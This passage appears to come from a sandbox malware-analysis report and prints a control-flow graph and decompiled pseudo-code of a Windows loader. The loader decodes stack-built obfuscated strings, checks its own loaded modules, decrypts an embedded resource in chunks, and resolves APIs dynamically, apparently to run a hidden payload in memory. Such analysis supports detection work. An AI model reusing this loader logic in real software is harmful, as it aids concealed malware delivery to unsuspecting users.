                                                                                                                                                                                                    control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 13 401c73-401c77 8->13 16 401c93-401c95 13->16 17 401c79-401c7b 13->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->13 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 40 401cf5-401cf7 36->40 38 401cda-401ce0 37->38 39 401cec-401cee 37->39 38->36 43 401ce2-401cea 38->43 39->40 40->25 44 401cf9-401d09 Module32Next 40->44 45 401f33-401f5d call 401560 41->45 46 401f73-401f75 42->46 47 401f6b-401f72 42->47 43->34 43->39 44->7 50 401d0f 44->50 45->42 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 46->48 49 401f77-401f8d call 401560 46->49 47->46 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 86 401d92-401d9a 81->86 82->83 83->25 87 401dad-401dbd Module32Next 83->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->82 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 74d01c 122->154 155 40234e call 74d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 74d01c 135->152 153 402390 call 74d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				void* _t337;
                                                                                                                                                                                                    				void* _t340;
                                                                                                                                                                                                    				int _t341;
                                                                                                                                                                                                    				CHAR* _t344;
                                                                                                                                                                                                    				intOrPtr* _t349;
                                                                                                                                                                                                    				int _t350;
                                                                                                                                                                                                    				long _t352;
                                                                                                                                                                                                    				signed int _t354;
                                                                                                                                                                                                    				intOrPtr _t358;
                                                                                                                                                                                                    				long _t359;
                                                                                                                                                                                                    				CHAR* _t364;
                                                                                                                                                                                                    				struct HINSTANCE__* _t365;
                                                                                                                                                                                                    				CHAR* _t366;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                    				int _t368;
                                                                                                                                                                                                    				int _t369;
                                                                                                                                                                                                    				int _t370;
                                                                                                                                                                                                    				intOrPtr* _t376;
                                                                                                                                                                                                    				int _t378;
                                                                                                                                                                                                    				intOrPtr _t379;
                                                                                                                                                                                                    				intOrPtr* _t381;
                                                                                                                                                                                                    				int _t383;
                                                                                                                                                                                                    				intOrPtr* _t384;
                                                                                                                                                                                                    				int _t385;
                                                                                                                                                                                                    				int _t396;
                                                                                                                                                                                                    				int _t399;
                                                                                                                                                                                                    				int _t402;
                                                                                                                                                                                                    				int _t405;
                                                                                                                                                                                                    				intOrPtr* _t407;
                                                                                                                                                                                                    				int _t413;
                                                                                                                                                                                                    				int _t415;
                                                                                                                                                                                                    				void* _t421;
                                                                                                                                                                                                    				int _t422;
                                                                                                                                                                                                    				int _t424;
                                                                                                                                                                                                    				intOrPtr* _t428;
                                                                                                                                                                                                    				intOrPtr _t429;
                                                                                                                                                                                                    				intOrPtr* _t431;
                                                                                                                                                                                                    				int _t432;
                                                                                                                                                                                                    				int _t435;
                                                                                                                                                                                                    				intOrPtr* _t437;
                                                                                                                                                                                                    				int _t438;
                                                                                                                                                                                                    				intOrPtr* _t439;
                                                                                                                                                                                                    				int _t440;
                                                                                                                                                                                                    				int _t442;
                                                                                                                                                                                                    				signed int _t448;
                                                                                                                                                                                                    				signed int _t451;
                                                                                                                                                                                                    				signed int _t452;
                                                                                                                                                                                                    				int _t469;
                                                                                                                                                                                                    				int _t471;
                                                                                                                                                                                                    				int _t482;
                                                                                                                                                                                                    				signed int _t486;
                                                                                                                                                                                                    				intOrPtr* _t488;
                                                                                                                                                                                                    				intOrPtr* _t490;
                                                                                                                                                                                                    				intOrPtr* _t492;
                                                                                                                                                                                                    				intOrPtr _t493;
                                                                                                                                                                                                    				void* _t494;
                                                                                                                                                                                                    				struct HRSRC__* _t497;
                                                                                                                                                                                                    				void* _t514;
                                                                                                                                                                                                    				int _t519;
                                                                                                                                                                                                    				intOrPtr* _t520;
                                                                                                                                                                                                    				void* _t524;
                                                                                                                                                                                                    				void* _t525;
                                                                                                                                                                                                    				struct HINSTANCE__* _t526;
                                                                                                                                                                                                    				intOrPtr _t527;
                                                                                                                                                                                                    				void* _t531;
                                                                                                                                                                                                    				void* _t535;
                                                                                                                                                                                                    				struct HRSRC__* _t536;
                                                                                                                                                                                                    				intOrPtr* _t537;
                                                                                                                                                                                                    				intOrPtr* _t539;
                                                                                                                                                                                                    				int _t542;
                                                                                                                                                                                                    				int _t543;
                                                                                                                                                                                                    				intOrPtr* _t547;
                                                                                                                                                                                                    				intOrPtr* _t548;
                                                                                                                                                                                                    				intOrPtr* _t549;
                                                                                                                                                                                                    				intOrPtr* _t550;
                                                                                                                                                                                                    				void* _t551;
                                                                                                                                                                                                    				intOrPtr _t552;
                                                                                                                                                                                                    				int _t555;
                                                                                                                                                                                                    				void* _t556;
                                                                                                                                                                                                    				void* _t557;
                                                                                                                                                                                                    				void* _t558;
                                                                                                                                                                                                    				void* _t559;
                                                                                                                                                                                                    				void* _t560;
                                                                                                                                                                                                    				void* _t561;
                                                                                                                                                                                                    				void* _t562;
                                                                                                                                                                                                    				intOrPtr* _t563;
                                                                                                                                                                                                    				void* _t564;
                                                                                                                                                                                                    				void* _t565;
                                                                                                                                                                                                    				void* _t566;
                                                                                                                                                                                                    				void* _t567;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t567 = __eflags;
                                                                                                                                                                                                    				_t494 = __edx;
                                                                                                                                                                                                    				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                    				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                    				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                    				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                    				_t557 = _t556 + 0xc;
                                                                                                                                                                                                    				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                    					L80:
                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                    					_t525 = _t340;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                    					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                    					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                    					if(_t341 == 0) {
                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                    						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                    						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                    						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                    						_t558 = _t557 + 8;
                                                                                                                                                                                                    						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                    						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                    						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                    						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                    						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                    						_push(0x40022);
                                                                                                                                                                                                    						_t537 = _t349; // executed
                                                                                                                                                                                                    						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                    						_t559 = _t558 + 8;
                                                                                                                                                                                                    						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                    						__eflags = _t350;
                                                                                                                                                                                                    						if(_t350 == 0) {
                                                                                                                                                                                                    							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                    							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                    							_t559 = _t559 + 0xc;
                                                                                                                                                                                                    							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                    						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                    						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                    						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                    						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                    						__eflags = _t354;
                                                                                                                                                                                                    						if(_t354 > 0) {
                                                                                                                                                                                                    							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                    							_t482 = _t537 - _t519;
                                                                                                                                                                                                    							__eflags = _t482;
                                                                                                                                                                                                    							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                    							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                    							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                    								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                    								_push(0x400);
                                                                                                                                                                                                    								_push(_t424);
                                                                                                                                                                                                    								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                    								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                    								_t179 = _t559 + 0x38;
                                                                                                                                                                                                    								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                    								__eflags =  *_t179;
                                                                                                                                                                                                    							} while ( *_t179 != 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                    						if(_t448 < 0) {
                                                                                                                                                                                                    							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                    							__eflags = _t448;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t448;
                                                                                                                                                                                                    						if(_t448 > 0) {
                                                                                                                                                                                                    							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                    							_push(_t421 + _t537);
                                                                                                                                                                                                    							_push(_t448);
                                                                                                                                                                                                    							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                    							__eflags = _t422;
                                                                                                                                                                                                    							_push(_t422);
                                                                                                                                                                                                    							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                    						_t560 = _t559 + 0xc;
                                                                                                                                                                                                    						FreeResource(_t551);
                                                                                                                                                                                                    						_t552 =  *_t537;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                    						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                    						_t561 = _t560 + 4;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                    						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                    						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                    						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                    						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                    						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                    						_t528 = _t527 + 0xe;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                    						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                    						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                    						_t562 = _t561 + 0x24;
                                                                                                                                                                                                    						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                    						_t538 = _t365;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                    						_t451 = _t562 + 0x134;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                    						 *((char*)(_t562 + 0x32)) = 0xe7;
